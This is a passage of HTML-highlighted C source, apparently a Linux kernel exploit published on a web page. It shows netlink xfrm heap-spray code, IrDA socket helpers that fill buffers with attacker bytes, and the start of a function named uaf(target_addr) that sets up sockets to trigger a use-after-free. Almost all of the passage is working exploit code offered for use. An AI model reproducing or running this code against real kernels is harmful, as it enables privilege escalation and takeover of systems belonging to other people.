class=\"crayon-o\">*<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-171\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">req_newsa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-172\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">j<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-173\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-174\"><span class=\"crayon-p\">#define SOCKFD 1000<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-175\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fds<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">SOCKFD<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-176\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* don&#8217;t make iter &gt;= 1000, or change SOCKFD <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-177\"><span class=\"crayon-c\">\t&nbsp;&nbsp; to a greated value *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-178\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">build_sa_frame<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">size<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-179\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">for<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">iter<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-o\">++<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-180\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">create_netlink_socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-181\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-182\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/\/printf(&#8220;send %dn&#8221;,i);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-183\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">send_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-o\">-&gt;<\/span><span class=\"crayon-v\">n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-184\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-v\">fds<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-185\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/* don&#8217;t close fds *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-186\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/\/free(sa); \/* don&#8217;t need to do this*\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-187\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-e\">usleep<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1000<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-188\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-189\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/free(sa);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-190\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-191\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-192\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_set_ias<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-193\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-194\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_ias_set <\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-195\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-196\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-197\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-198\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-199\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">strncpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_class_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-200\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_attrib_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8216;C&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">255<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-201\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_attrib_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-202\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-m\">attribute<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_attrib_octet_seq<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-203\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-204\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-m\">attribute<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">irda_attrib_octet_seq<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">octet_seq<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x41<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">1023<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-205\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-206\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">daddr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-207\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-208\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">setsockopt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x10a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-209\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-210\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/printf(&#8220;setsockopt(SET) fd=%d&nbsp;&nbsp;err=%dn&#8221;,fd,err);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-211\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-212\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-213\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-214\"><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">u_int16_t&nbsp;&nbsp;<\/span><span class=\"crayon-v\">family<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-e\">u_int8_t <\/span><span class=\"crayon-v\">lsap_sel<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sir_addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-215\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-216\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_irda <\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">sa1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-217\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-218\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-219\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-220\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sir_family<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">family<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-221\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sir_lsap_sel<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lsap_sel<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-222\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sir_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sir_addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-223\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-224\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memcpy<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">sir_name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">25<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-225\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sockaddr<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-226\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/\/printf(&#8220;bind fd=%d err=%dn&#8221;,fd,err);<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-227\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-228\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-229\"><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-230\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-231\"><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">uaf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">unsigned<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">long<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">target_addr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-232\"><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-233\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-234\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sockaddr_irda <\/span><span class=\"crayon-v\">sa<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">sa1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-235\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">irda_ias_set <\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-236\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">err<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-237\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">pthread_t <\/span><span class=\"crayon-v\">tid<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-238\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-239\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">memset<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-r\">sizeof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">set<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-240\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-241\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-242\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-243\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-244\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-245\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd3<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-246\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-247\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">fd4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0x17<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x5<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-248\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-249\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* create namespace for xfrm <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-250\"><span class=\"crayon-c\">\t * this is not required to trigger the bug<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-251\"><span class=\"crayon-c\">\t *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-252\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">create_ns<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-253\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-254\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4a<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-255\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-256\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">i<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-257\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bad57622f389003567142-258\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">irda_bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">fd2<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x4b<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x3<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;c&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bad57622f389003567142-259\"><span class=\"crayon-h\">\t<\/span><span 